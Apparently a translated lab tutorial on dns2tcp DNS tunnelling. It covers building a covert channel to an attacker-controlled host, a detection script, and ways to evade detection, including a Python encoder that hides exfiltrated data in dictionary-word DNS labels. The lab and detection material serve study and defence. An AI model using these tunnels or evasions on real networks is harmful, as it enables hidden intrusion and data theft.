
Intranet penetration series: dns2tcp for intranet tunnels

2022-04-23 08:01:00 Fish in Siyuan Lake

Preface

This article looks at dns2tcp, a DNS tunneling tool.

github:https://github.com/alex-sector/dns2tcp

I. Overview

1. Introduction

Last updated in 2017; written in C.

TCP over DNS: it forwards TCP connections through a DNS tunnel, with no encryption of the tunnelled data. It uses direct connections, and throughput is not great. Its advantage is that Kali ships with it, and some Linux distributions offer it through their package manager, which makes it convenient to get hold of.

  • Builds the tunnel through legitimate DNS servers (the normal resolver chain)
  • Client/server (dns2tcpc / dns2tcpd) structure
  • By default carries data base64-encoded in TXT records (A records are too short)
  • Keeps the connection alive after the tunnel is built: a keep-alive packet roughly every 0.6 s, with a configurable maximum of 3 s
  • Needs to be combined with other proxy tools

2. Principle

For how DNS resolution works, see the earlier post "One article makes DNS domain name resolution clear".

The tool base64-encodes the data and carries it in TXT records. Because the tunnel domain is delegated to the attacker's host (an NS record plus an A record on the authoritative DNS server), the DNS packets for that domain are forwarded to the attacker's dns2tcpd, which completes the traffic proxy. Note that base64 is an encoding, not encryption: anyone who captures the queries can decode the payload.

3. Usage

Common options:

-c    enable compression of tunnel traffic
-F    run in the foreground (dns2tcpd)
-f    specify the configuration file
-r    specify the resource to use
-z    specify the DNS domain (the delegated tunnel zone)
-k    set the tunnel password
-l    local port to listen on
-d    debug level (1 | 2 | 3)

(1) Server side

Edit the configuration file /etc/dns2tcpd.conf
Start the tunnel endpoint: dns2tcpd -F -d 1 -f /etc/dns2tcpd.conf

(2) Client

Test whether the server can be reached (this lists the resources it exposes): dns2tcpc -z xxx.xx.xxx
Build a tunnel to the ssh resource: dns2tcpc -c -k password -d 1 -l 7002 -r ssh -z xxx.xx.xxx
Then point the corresponding client program at the local port (for example ssh -p 7002 127.0.0.1).
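As an added example (not the configuration from the original post or from the dns2tcp project), here is a minimal /etc/dns2tcpd.conf that matches the commands above. The zone name tunnel.example.com, the key and the resource addresses are assumptions; the setting names follow the sample configuration shipped with dns2tcp.

```ini
# /etc/dns2tcpd.conf (added example; zone, key and addresses are assumed)
# Address and UDP port the server binds; queries for the delegated zone must reach it
listen = 0.0.0.0
port = 53
# Drop privileges after binding port 53
user = nobody
chroot = /tmp
# The zone delegated to this host with the NS record; the client passes it with -z
domain = tunnel.example.com
# Shared tunnel password; the client passes the same value with -k
key = password
# Resources offered to the client (-r name), as name:host:port
resources = ssh:127.0.0.1:22 , http:127.0.0.1:80 , smtp:127.0.0.1:25
```

Start it with dns2tcpd -F -d 1 -f /etc/dns2tcpd.conf. On the client, dns2tcpc -z tunnel.example.com should then list ssh, http and smtp, and dns2tcpc -c -k password -d 1 -l 7002 -r ssh -z tunnel.example.com followed by ssh -p 7002 127.0.0.1 reaches the SSH daemon behind the server. The key only authenticates the client; the tunnel payload stays base64, not encrypted, so anything sensitive should run inside its own encrypted protocol such as SSH.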

II. Practice

1. Test scenario

(1) Attacker

Kali 2021, 192.168.10.128

(2) DNS server

Windows Server 2008: 192.168.10.200

Set a static IP; see https://blog.csdn.net/pockeyfan/article/details/42063683

Create an A record pointing to the attacker's Kali host
[screenshot]
Create a new delegation (an NS record) pointing at the name of the A record just created
[screenshot]
Create another A record pointing to the Windows Server itself
[screenshot]

(3) Target machine

Ubuntu 18.04, 192.168.10.129

Because the lab DNS server stands in for the real authoritative server, the target must resolve the tunnel domain through it, so the target's DNS resolver is changed to point at the DNS server.

[screenshot]
Check with nslookup

[screenshot]

2. Build the tunnel

(1) Server side

Start the apache service

[screenshot]

Edit the configuration file
[screenshot]
After modification
[screenshot]

Start listening
[screenshot]

(2) Client

Test whether the server can be reached
[screenshot]

Start the tunnel

[screenshot]

The http service can now be reached through the local port

[screenshot]
Likewise ssh, nc, smtp and other services can be proxied through the tunnel
Note: ssh occasionally reports "connection reset by peer"; retrying a few times usually works

3. Packet capture

Handshake phase
[screenshot]
Keep-alive packets: all are queries for normal-looking domain names
[screenshot]
While the tunnel is in use there are many TXT record packets, with the base64-encoded content placed in the queried domain name
[screenshot]

III. Exploration

1. Source code analysis

TODO

2. Detection and bypass

(1) Abnormal number of DNS packets

As the capture above shows, while the tunnel is in use there are close to 200 DNS packets per second, all going to the same DNS server.

Bypass: add a delay between packets, at the cost of a very slow tunnel.

(2) Special record type: TXT

Usually only mail servers and gateways query TXT records, and not many of them; in normal DNS traffic TXT records may account for only 1%-2%.

Bypass: mix A, AAAA, TXT, MX, CNAME and other record types. dns2tcp itself only uses TXT (or KEY) records, so this needs changes to the tool.

(3) Abnormal domain names

The queried names contain base64-like strings, which can be detected by information entropy and similar methods.
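An added example (Python, not code from the post or from dns2tcp) of the three measurable heuristics above, (1) query rate, (2) share of TXT queries and (3) entropy of the data-carrying labels, run over constructed log records. The record format, the thresholds and the IP addresses are assumptions; the tunnelling client is given about 200 TXT queries within one second to mirror the capture described in (1).

```python
import base64
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s: str) -> float:
    """Bits per character of s (0.0 for an empty or single-symbol string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def data_labels(qname: str, zone_labels: int = 2) -> str:
    """Labels left of the registered domain, i.e. the part a tunnel fills with data.
    Assumes a two-label registered domain; raise zone_labels for deeper zones."""
    return "".join(qname.rstrip(".").split(".")[:-zone_labels])


def summarize(records, window: float = 1.0) -> dict:
    """records: iterable of (timestamp, client, qtype, qname).
    Per client: query count, peak queries inside any sliding window of
    `window` seconds, share of TXT queries, highest data-label entropy seen."""
    by_client = defaultdict(list)
    for ts, client, qtype, qname in records:
        by_client[client].append((ts, qtype, qname))
    stats = {}
    for client, recs in by_client.items():
        recs.sort()
        times = [r[0] for r in recs]
        peak, lo = 0, 0
        for hi, t in enumerate(times):          # sliding window over sorted times
            while t - times[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        txt = sum(1 for _, qtype, _ in recs if qtype == "TXT")
        entropies = [shannon_entropy(data_labels(qname)) for _, _, qname in recs]
        stats[client] = {
            "queries": len(recs),
            "peak_per_window": peak,
            "txt_ratio": txt / len(recs),
            "max_entropy": max(entropies),
        }
    return stats


def flag_tunnels(stats: dict, max_rate: int = 50, max_txt_ratio: float = 0.1,
                 max_entropy: float = 3.5) -> dict:
    """Map client -> list of triggered heuristics. The thresholds are
    illustrative assumptions, not values from the post; tune them on a baseline."""
    flagged = {}
    for client, s in stats.items():
        reasons = []
        if s["peak_per_window"] > max_rate:
            reasons.append("rate")
        if s["txt_ratio"] > max_txt_ratio:
            reasons.append("txt")
        if s["max_entropy"] > max_entropy:
            reasons.append("entropy")
        if reasons:
            flagged[client] = reasons
    return flagged


def sample_records() -> list:
    """Constructed traffic, not a real capture: 200 TXT queries within one second
    from the tunnelling host 192.168.10.129 (high-entropy base64 labels under
    tunnel.example.com) plus ordinary lookups from a workstation 192.168.10.50."""
    recs = []
    base = 1650700000.0
    for i in range(200):
        blob = hashlib.sha256(i.to_bytes(2, "big")).digest()
        label = base64.b64encode(blob).decode().rstrip("=").replace("+", "").replace("/", "")
        recs.append((base + i * 0.005, "192.168.10.129", "TXT", f"{label}.tunnel.example.com"))
    normal = ["www.example.com", "mail.example.com", "update.example.org",
              "login.example.net", "intranet.example.com"]
    for i in range(20):
        recs.append((base + i * 0.1, "192.168.10.50", "A", normal[i % len(normal)]))
    recs.append((base + 0.05, "192.168.10.50", "TXT", "_dmarc.example.com"))  # one legitimate TXT
    return recs


if __name__ == "__main__":
    stats = summarize(sample_records())
    for client, s in stats.items():
        print(client, s, flag_tunnels({client: s}).get(client, []))
```

On the constructed sample only 192.168.10.129 trips all three heuristics. Each check has a known evasion discussed in this section (pacing, mixing record types, dictionary labels), which is why a detector should combine them and compare against the site's own baseline rather than rely on any one threshold.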

Bypass: keep a dictionary of common domain-name words and split the data across them, which greatly increases the number of packets.

For example, to exfiltrate the file name finalexamanswer.doc:
base64 once -> ZmluYWxleGFtYW5zd2VyLmRvYw
Then encode it with common words, so that Zm -> zone.music.domain, lu -> login.user.domain, YW -> yun.web.domain ...
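The dictionary scheme sketched above, worked through as an added example (Python, not code from the post or from dns2tcp). The 64-word label table is constructed for this illustration; it follows the post's three sample mappings and only needs to be a bijection shared by both ends. A decoder for the receiving side and the plain single-label encoding are included so the packet-count cost is visible.

```python
import base64
import string
from typing import List

# Constructed lookup table (an assumption for illustration): one plausible
# hostname label per base64 alphabet character. Upper and lower case map to
# different labels, following the post's example (Z -> zone, m -> music,
# l -> login, u -> user, Y -> yun, W -> web).
_LABELS = dict(zip(
    string.ascii_uppercase,
    "account backup cache data email files gateway help images jobs kb ldap "
    "mail news oauth portal queue reports static tools update video web xmpp "
    "yun zone".split(),
))
_LABELS.update(zip(
    string.ascii_lowercase,
    "api blog cdn dev eu ftp git home intranet jira kiosk login music node "
    "office print qa remote shop test user vpn wiki xen yard zabbix".split(),
))
_LABELS.update({d: f"srv{d}" for d in string.digits})
_LABELS.update({"+": "plus", "/": "slash"})
assert len(_LABELS) == 64 and len(set(_LABELS.values())) == 64  # must be a bijection
_CHARS = {label: ch for ch, label in _LABELS.items()}


def encode_queries(payload: bytes, domain: str, chunk: int = 2) -> List[str]:
    """Split base64(payload) into `chunk`-character pieces and turn each piece
    into one query name made of dictionary labels under `domain`."""
    b64 = base64.b64encode(payload).decode().rstrip("=")   # padding restored on decode
    names = []
    for i in range(0, len(b64), chunk):
        labels = [_LABELS[c] for c in b64[i:i + chunk]]
        names.append(".".join(labels + [domain]))
    return names


def decode_queries(names: List[str], domain: str) -> bytes:
    """Reverse encode_queries on the receiving (authoritative DNS server) side."""
    suffix = "." + domain
    b64 = ""
    for name in names:
        if not name.endswith(suffix):
            raise ValueError(f"query outside the tunnel zone: {name}")
        for label in name[:-len(suffix)].split("."):
            b64 += _CHARS[label]
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64)


def naive_query(payload: bytes, domain: str) -> str:
    """The straightforward encoding for comparison: the whole base64 blob as a
    single label (urlsafe alphabet, since '+' and '/' are not label characters)."""
    return base64.urlsafe_b64encode(payload).decode().rstrip("=") + "." + domain


if __name__ == "__main__":
    secret = b"finalexamanswer.doc"
    for q in encode_queries(secret, "example.com"):
        print(q)
    print(len(encode_queries(secret, "example.com")), "queries instead of 1:",
          naive_query(secret, "example.com"))
```

Running it shows that the 19-byte file name costs 13 queries of low-entropy labels instead of one 26-character base64 label; a longer payload or a smaller chunk size pushes the ratio up further, which is the trade-off the text mentions. A per-label entropy check no longer fires on these names, but the rate-based check from (1) fires sooner, because the tunnel now sends many more packets for the same data.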

(4) Keep-alive packets

The interval and the number of keep-alive packets are a giveaway.

Bypass: lengthen the interval, or even randomize it; the count can be changed by rebuilding the tunnel on a new UDP socket.

(5) Command signatures

Some fixed strings in the tunnel's control commands are characteristic.

Bypass: change the strings.

Conclusion

Sending keep-alive packets as requests for normal-looking domain names is a nice touch, but there is still room for improvement.

Copyright notice
This article was written by [Fish in Siyuan Lake]; please include the original link when reposting. Thanks.
https://yzsam.com/2022/04/202204230628265645.html